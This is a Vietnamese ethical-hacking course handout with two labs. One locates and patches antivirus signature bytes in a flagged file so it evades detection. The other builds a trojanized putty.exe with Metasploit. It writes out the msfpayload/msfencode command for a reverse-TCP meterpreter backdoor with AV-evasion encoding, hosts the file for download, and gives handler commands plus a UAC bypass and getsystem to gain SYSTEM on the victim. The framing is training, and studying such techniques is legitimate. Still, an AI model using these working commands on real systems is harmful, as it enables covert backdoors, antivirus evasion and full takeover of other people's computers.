Athena Ethical

Hacker Lab
Virus Worm Trojan Module
By Pass Anti Virus
Tạo Trojan bằng Metasploit
Bài: By Pass Anti Virus
I. Mục đích bài lab

- Hầu hết các chương trình chống virus đều nhận dạng file là chương trình
độc hại dựa trên signature database được update thường xuyên
- Các công cụ cần thiết cho bài lab. Các công cụ này ta cài đặt trong 1 máy
tính
o Dsplit: được sử dụng để cắt các file thành nhiều phần với độ dài tăng
dần.
o Hex Editor: để sử dụng phân tích chương trình và thay đổi các giá trị
trong file
o Chương trình scan virus để kiểm tra. Trong bài lab này ta sẽ sử dụng
chương trình Avast
o 1 File được các chương AV cảnh báo. Trong bài lab ta sẽ sử dụng
chương trình “Ice Gold Freezer”
o Các công cụ scan virus online ví dụ như trang web
www.virustotal.com

II. Các bước thực hiện

- Ta thử scan file “Ice Gold Freezer” bằng trang web www.virustotal.com thì
24/43 chương trình nhận dạng đây là Malware

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Copy source “Ice Gold Freezer” vào folder chứa source chương trình Dsplit
ta thực hiện quá trình cắt file thành các đoạn và sử dụng Avast scan các file
này. Thông qua quá trình này ta sẽ ước lượng được signature nhận virus sẽ
nằm ở phần nào trong file.

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Ta sử dụng Avast scan tất cả các file đã được cắt ra và xác định file nào bắt
đầu từ byte nào thì file bị nhận là Virus

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Theo kết quả màn hình ở trên thì từ byte thứ 102000 thì chương trình
được nhận là virus. Ta xóa hết các file đã được cắt nhỏ.
- Tiếp tục ta sẽ kiểm tra xem từ byte 101000 đến 102000 thì như thế nào ?
Ta sử dụng khoảng tăng là 100 byte.

- Ta scan các file vừa được tạo ra bằng Avast một lần nữa

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Kết quả thu được là từ file 101900 đến 102000 được nhận là virus.

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Ta tiếp tục kiểm tra phân đoạn từ 101800 đến 101900 với khoảng tăng là
10 byte và scan lại.

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Kết quả thu được là từ file 101820 sẽ được nhận là virus.

- Ta sẽ tiếp tục phân tích từ file 101810 đến 101820 với khoảng tăng là 1
byte như thế nào ?

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Đến đây thì ta đã xác định được byte 101819 được xác định là có virus

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân
- Ta sẽ thay đổi giá trị 101819 thành một giá trị khác. Ở đây ta sẽ đánh thêm vào
2 lần phím spacebar. Ta sẽ thấy xuất hiện thêm 2 giá trị hexa là 20 20 trên
màn hình.

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân
 - Sau đó ta thử upload chương trình lên virustotal và kiểm tra kết quả scan ta
được tỷ lệ 7/42 AV nhận đây là virus

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

Bài : Tạo Trojan bằng Metasploit
1. Mục đích bài lab
- Mục đích bài lab: sử dụng công cụ msfpayload và msfencode có trong
Metasploit để tạo ra file Trojan. Ta chuẩn bị file thực thi exe nào đó. Ví dụ như
ở đây ta sử dụng chương trình putty.exe
- Sử dụng msfpayload để tạo backdoor. Sau đó ta sử dụng msfencode để by
pass anti virus
- Sơ đồ bài lab

234

Attacker
192.168.1.0/24 Victim

2. Các bước thực hiện

- Đầu tiên ta copy file putty.exe vào trong máy backtrack 5. Ta thực hiện câu
lệnh bên dưới với giá trị LHOST là IP của attacker, LPORT là port mà máy
attacker sử dụng để quản lý kết nối. “ ./msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=4455 R |
./msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /root/Desktop/putty.exe -o
/root/Desktop/putty_backdoor.exe “

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

- Sau khi tạo xong backdoor bước kế tiếp là làm sao gửi file backdoor này đến
victim. Ví dụ ở đây ta start dịch vụ apache2 và copy file này vào trong folder
/var/www

- Khởi động dịch vụ apache 2 và kiểm tra download file

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

- Sau khi ta đã chuẩn bị xong mọi thứ ta sử dụng tính năng
“exploit/multi/handler” để quản lý các kết nối từ máy victim đến máy
attacker.

msf >use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) >set LHOST 192.168.1.234

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 msf exploit(handler) >set LPORT 4455

LPORT => 4455

msf exploit(handler) >exploit –j

- Victim thực thi file putty_backdoor.exe thì tại máy attacker sẽ có được 1
kết nối điều khiển.

- Tiếp tục ta nhập vào câu lệnh “run post/windows/escalate/bypassuac” thì

metasploit sẽ tạo ra 1 sessions mới.

- Ta kết nối vào sessions số 5 bằng cách nhập vào câu lệnh “background” và
“sessions –l” và “sessions –i 5”

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

- Thông qua kết nối mới ta nhập vào các câu lệnh getprivs, getsystem, getuid để
ta có quyền system với máy victim.

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân